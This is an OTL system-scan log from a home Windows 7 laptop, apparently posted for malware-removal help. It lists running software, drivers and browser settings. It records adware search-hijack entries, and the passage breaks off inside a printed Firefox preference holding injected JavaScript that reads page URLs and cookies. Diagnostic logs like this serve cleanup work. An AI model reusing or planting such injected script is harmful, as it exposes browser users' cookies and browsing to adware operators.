OTL logfile created on: 8/4/2014 10:53:00 AM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Robin\Desktop
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17126)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.79 Gb Total Physical Memory | 2.07 Gb Available Physical Memory | 54.64% Memory free
10.63 Gb Paging File | 8.72 Gb Available in Paging File | 82.08% Paging File free
Paging file location(s): c:\pagefile.sys 7000 7000 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 59.62 Gb Total Space | 14.22 Gb Free Space | 23.85% Space Free | Partition Type: NTFS
Drive D: | 29.72 Gb Total Space | 18.91 Gb Free Space | 63.62% Space Free | Partition Type: NTFS
 
Computer Name: ROBIN-PC | User Name: Robin | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
[color=#E56717]========== Processes (SafeList) ==========[/color]
 
PRC - [2014/08/04 10:51:41 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Robin\Desktop\OTL.exe
PRC - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014/04/17 15:32:42 | 000,009,216 | ---- | M] (Ellora Assets Corp.) -- C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe
PRC - [2013/12/21 07:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
PRC - [2011/08/12 19:41:16 | 000,016,848 | ---- | M] (AsusTek) -- C:\Program Files (x86)\ASUS\ASUS Touch Tech\QuickGesture\x86\QuickGesture.exe
PRC - [2011/08/12 19:41:14 | 000,098,768 | ---- | M] (AsusTek) -- C:\Program Files (x86)\ASUS\ASUS Touch Tech\AsusMagnifier3D.exe
PRC - [2011/06/15 16:02:46 | 000,048,768 | ---- | M] () -- C:\Program Files (x86)\ASUS\ControlDeck for EeeSlate\ControlDeckManager.exe
PRC - [2011/06/03 23:44:38 | 000,101,800 | ---- | M] (ASUSTeK Computer Inc.) -- C:\Program Files (x86)\ASUS\HotkeyService\HotKeyMon.exe
PRC - [2011/06/03 23:44:32 | 001,258,416 | ---- | M] (ASUSTeK Computer Inc.) -- C:\Program Files (x86)\ASUS\HotkeyService\HotkeyService.exe
PRC - [2011/06/03 23:44:32 | 000,224,680 | ---- | M] () -- C:\Windows\SysWOW64\AsusService.exe
PRC - [2010/12/01 10:53:02 | 000,154,784 | ---- | M] (Atheros) -- C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
PRC - [2010/11/24 19:48:04 | 000,285,312 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\EeeSlate Hotkey\PadKeyCtrl.exe
PRC - [2010/09/14 02:32:32 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2010/09/14 02:32:30 | 000,283,160 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
PRC - [2010/02/23 14:56:08 | 001,160,480 | ---- | M] (Infineon Technologies AG) -- C:\Program Files (x86)\Infineon\Security Platform Software\IFXSPMGT.exe
PRC - [2010/02/23 14:52:20 | 000,345,376 | ---- | M] (Infineon Technologies AG) -- C:\Program Files (x86)\Infineon\Security Platform Software\PSDrt.exe
PRC - [2010/02/23 14:44:38 | 000,214,304 | ---- | M] (Infineon Technologies AG) -- C:\Program Files (x86)\Infineon\Security Platform Software\IfxPsdSv.exe
PRC - [2010/02/23 14:35:22 | 001,209,632 | ---- | M] (Infineon Technologies AG) -- C:\Program Files (x86)\Infineon\Security Platform Software\SpTNA.exe
PRC - [2010/02/23 13:27:24 | 000,992,544 | ---- | M] (Infineon Technologies AG) -- C:\Program Files (x86)\Infineon\Security Platform Software\IFXTCS.exe
PRC - [2010/02/19 04:15:48 | 002,533,400 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2010/02/19 04:15:46 | 000,325,144 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2007/08/22 20:23:04 | 000,225,280 | ---- | M] (PFU LIMITED) -- C:\Program Files (x86)\PFU\Error Recovery Guide\FTErGuid.exe
PRC - [2007/03/09 00:25:32 | 000,131,072 | ---- | M] (FUJITSU LIMITED) -- C:\Windows\twain_32\Fjscan32\FjtwMkup.exe
PRC - [2007/03/09 00:23:04 | 000,045,056 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\FJTWMKSV.exe
PRC - [2007/03/08 01:24:20 | 000,212,992 | ---- | M] (PFU LIMITED) -- C:\Windows\twain_32\Fjscan32\SOP\FtLnSOP.exe
 
 
[color=#E56717]========== Modules (No Company Name) ==========[/color]
 
MOD - [2014/05/15 14:01:00 | 000,475,136 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\ff0008cf5010dc37162a45dec39f0f66\IAStorUtil.ni.dll
MOD - [2014/05/15 12:31:08 | 011,922,944 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Web\70dbdd46969daf2bea2443c75b7629d4\System.Web.ni.dll
MOD - [2014/05/15 12:30:46 | 000,774,144 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\98c91b8d3f1d54c41ada5f37e0935303\System.Runtime.Remoting.ni.dll
MOD - [2014/02/12 13:55:09 | 000,014,336 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\IAStorCommon\ca708d556b8236f0e2a42a36d74c2118\IAStorCommon.ni.dll
MOD - [2014/02/12 13:39:43 | 012,436,480 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\8bc548587e91ecf0552a40e47bbf99cc\System.Windows.Forms.ni.dll
MOD - [2014/02/12 13:39:13 | 001,593,344 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5c24d3b0041ebf4f48a93615b9fa3de9\System.Drawing.ni.dll
MOD - [2014/02/12 13:38:51 | 005,464,064 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\217ece46920546d718414291d463bb1c\System.Xml.ni.dll
MOD - [2014/02/12 13:38:38 | 000,978,432 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\5b6ddf934128d538cd5cd77bf4209b93\System.Configuration.ni.dll
MOD - [2014/02/12 13:37:53 | 003,348,480 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\1d696b2d3de530f7ee971070263667ff\WindowsBase.ni.dll
MOD - [2014/02/12 13:37:40 | 007,989,760 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll
MOD - [2014/02/12 13:37:18 | 011,499,520 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll
MOD - [2011/06/15 16:02:46 | 000,048,768 | ---- | M] () -- C:\Program Files (x86)\ASUS\ControlDeck for EeeSlate\ControlDeckManager.exe
 
 
[color=#E56717]========== Services (SafeList) ==========[/color]
 
SRV:[b]64bit:[/b] - [2014/05/30 10:21:05 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/04/30 15:45:22 | 000,204,576 | ---- | M] (Microsoft) [Auto | Running] -- C:\Program Files\Softland\novaPDF 8\Server\novapdfs.exe -- (NovaPdfServer)
SRV:[b]64bit:[/b] - [2013/10/23 18:14:22 | 000,348,376 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2013/10/23 18:14:22 | 000,023,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2013/05/27 06:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2010/09/17 10:37:01 | 000,219,136 | ---- | M] () [Auto | Running] -- C:\Program Files\ASUS\MemoryClean\service.exe -- (MemoryClean)
SRV:[b]64bit:[/b] - [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/04/17 15:32:42 | 000,009,216 | ---- | M] (Ellora Assets Corp.) [Auto | Running] -- C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe -- (FreemakeVideoCapture)
SRV - [2013/12/21 07:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/10/23 09:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2011/06/03 23:44:32 | 000,224,680 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\AsusService.exe -- (AsusService)
SRV - [2010/12/01 10:53:02 | 000,154,784 | ---- | M] (Atheros) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe -- (Atheros Bt&Wlan Coex Agent)
SRV - [2010/12/01 10:51:56 | 000,052,896 | ---- | M] (Atheros Commnucations) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
SRV - [2010/09/14 02:32:32 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2010/02/23 14:56:08 | 001,160,480 | ---- | M] (Infineon Technologies AG) [Auto | Running] -- C:\Program Files (x86)\Infineon\Security Platform Software\IFXSPMGT.exe -- (IFXSpMgtSrv)
SRV - [2010/02/23 14:44:38 | 000,214,304 | ---- | M] (Infineon Technologies AG) [Auto | Running] -- C:\Program Files (x86)\Infineon\Security Platform Software\IfxPsdSv.exe -- (PersonalSecureDriveService)
SRV - [2010/02/23 13:27:24 | 000,992,544 | ---- | M] (Infineon Technologies AG) [Auto | Running] -- C:\Program Files (x86)\Infineon\Security Platform Software\IFXTCS.exe -- (IFXTCS)
SRV - [2010/02/19 04:15:48 | 002,533,400 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2010/02/19 04:15:46 | 000,325,144 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2009/06/10 22:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2007/03/09 00:23:04 | 000,045,056 | ---- | M] (PFU LIMITED) [Auto | Running] -- C:\Windows\twain_32\Fjscan32\FJTWMKSV.exe -- (FJTWMKSV)
 
 
[color=#E56717]========== Driver Services (SafeList) ==========[/color]
 
DRV:[b]64bit:[/b] - [2014/05/17 01:42:38 | 000,042,184 | ---- | M] (Anchorfree Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\taphss6.sys -- (taphss6)
DRV:[b]64bit:[/b] - [2014/01/08 22:50:34 | 000,141,920 | ---- | M] (Acronis) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\vsflt53.sys -- (vidsflt53)
DRV:[b]64bit:[/b] - [2013/09/30 17:26:50 | 000,019,152 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdrvio.sys -- (pwdrvio)
DRV:[b]64bit:[/b] - [2013/09/30 17:26:48 | 000,012,504 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdspio.sys -- (pwdspio)
DRV:[b]64bit:[/b] - [2013/09/27 10:53:06 | 000,134,944 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:[b]64bit:[/b] - [2013/09/06 14:25:40 | 000,131,856 | ---- | M] (Oracle Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys -- (VBoxNetAdp)
DRV:[b]64bit:[/b] - [2013/09/05 18:13:56 | 003,831,808 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:[b]64bit:[/b] - [2013/06/26 19:21:48 | 000,028,840 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Sftredirlh.sys -- (Sftredir)
DRV:[b]64bit:[/b] - [2013/02/19 13:44:10 | 012,312,928 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2012/08/23 15:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2012/08/23 15:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2012/08/23 15:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2012/08/01 19:13:40 | 000,038,632 | ---- | M] (AnchorFree Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\taphss.sys -- (taphss)
DRV:[b]64bit:[/b] - [2012/03/01 07:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2011/08/23 05:12:58 | 000,317,440 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2011/08/12 19:41:16 | 000,024,192 | ---- | M] (ASUS Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HidFilter.sys -- (hidfilter)
DRV:[b]64bit:[/b] - [2011/03/11 07:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/03/11 07:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2011/01/24 05:31:10 | 000,283,136 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:[b]64bit:[/b] - [2010/12/31 08:17:00 | 000,098,816 | ---- | M] (ASIX Electronics Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ax88772b.sys -- (AX88772B)
DRV:[b]64bit:[/b] - [2010/12/01 18:52:10 | 000,051,872 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AthDfu.sys -- (ATHDFU)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,298,144 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,201,376 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,154,272 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,055,456 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,036,000 | ---- | M] (Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)
DRV:[b]64bit:[/b] - [2010/12/01 10:52:12 | 000,028,832 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_bus.sys -- (BTATH_BUS)
DRV:[b]64bit:[/b] - [2010/11/21 04:24:15 | 000,146,432 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\rmcast.sys -- (RMCAST)
DRV:[b]64bit:[/b] - [2010/11/21 04:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2010/11/21 04:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2010/11/20 14:34:04 | 000,194,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpchbus.sys -- (vpcbus)
DRV:[b]64bit:[/b] - [2010/11/20 12:35:34 | 000,095,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpcusb.sys -- (vpcusb)
DRV:[b]64bit:[/b] - [2010/11/20 12:35:26 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpcuxd.sys -- (vpcuxd)
DRV:[b]64bit:[/b] - [2010/10/07 22:09:06 | 000,012,928 | ---- | M] () [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ATKEMUx64.sys -- (ATKEMU)
DRV:[b]64bit:[/b] - [2010/09/14 02:24:26 | 000,437,272 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2010/02/26 09:32:12 | 000,158,976 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)
DRV:[b]64bit:[/b] - [2010/01/25 11:06:06 | 000,044,576 | ---- | M] (Infineon Technologies AG) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\psd.sys -- (PersonalSecureDrive)
DRV:[b]64bit:[/b] - [2009/11/20 15:26:50 | 000,031,232 | ---- | M] (The OpenVPN Project) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tap0901.sys -- (tap0901)
DRV:[b]64bit:[/b] - [2009/09/17 05:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:[b]64bit:[/b] - [2009/07/14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/07/14 01:39:20 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV:[b]64bit:[/b] - [2009/07/14 00:21:48 | 000,038,400 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2009/07/09 11:00:00 | 000,055,280 | ---- | M] (Sonic Solutions) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:[b]64bit:[/b] - [2009/06/10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/10 21:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/10 21:34:18 | 000,057,344 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2009/06/10 21:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2010/09/06 18:26:46 | 000,017,024 | ---- | M] (ASUS) [Kernel | System | Running] -- C:\Program Files (x86)\ASUS\ATK WMIACPI\epcwmiacpi64.sys -- (ATKWMIACPIIO)
DRV - [2009/07/14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
[color=#E56717]========== Standard Registry (SafeList) ==========[/color]
 
 
[color=#E56717]========== Internet Explorer ==========[/color]
 
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {EEE7E0A3-AE64-4dc8-84D1-F5D7BAF2DB0C}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP10&src=IE-SearchBox
IE - HKLM\..\SearchScopes\{EEE7E0A3-AE64-4dc8-84D1-F5D7BAF2DB0C}: "URL" = http://slirsredirect.search.aol.com/redirector/sredir?sredir=2685&query={searchTerms}&invocationType=tb50-ie-winamp-chromesbox-en-us&tb_uuid=20120907193522026&tb_oid=07-09-2012&tb_mrud=07-09-2012
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus.msn.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://uk.msn.com/?rd=1&ucc=GB&dcc=GB&opt=0
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = F6 BE 0C 48 93 AF CF 01  [binary data]
IE - HKCU\..\URLSearchHook: {a060276a-53be-45ec-8ebe-b94b1e803179} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR
IE - HKCU\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://search.babylon.com/?q={searchTerms}&affID=114435&tt=3012_7&babsrc=SP_ss&mntrId=9e997759000000000000162f68ded46d
IE - HKCU\..\SearchScopes\{77D585F2-B37F-402B-8603-4ACE364957EA}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2549263
IE - HKCU\..\SearchScopes\{8C9D571A-4883-4E95-9BF8-CA00CAB524E0}: "URL" = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYGB&apn_uid=2A077338-30E8-4347-9AF7-66D0C8312834&apn_sauid=A9118DB0-520A-4664-AD26-6BC54FC94B9A
IE - HKCU\..\SearchScopes\{EEE7E0A3-AE64-4dc8-84D1-F5D7BAF2DB0C}: "URL" = http://slirsredirect.search.aol.com/redirector/sredir?sredir=2685&query={searchTerms}&invocationType=tb50-ie-winamp-chromesbox-en-us&tb_uuid=20120907193522026&tb_oid=07-09-2012&tb_mrud=07-09-2012
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>
 
[color=#E56717]========== FireFox ==========[/color]
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.enabledAddons: %7B0b457cAA-602d-484a-8fe7-c1d894a011ba%7D:0.98.59
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:31.0
FF - prefs.js..extensions.gycon.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"ha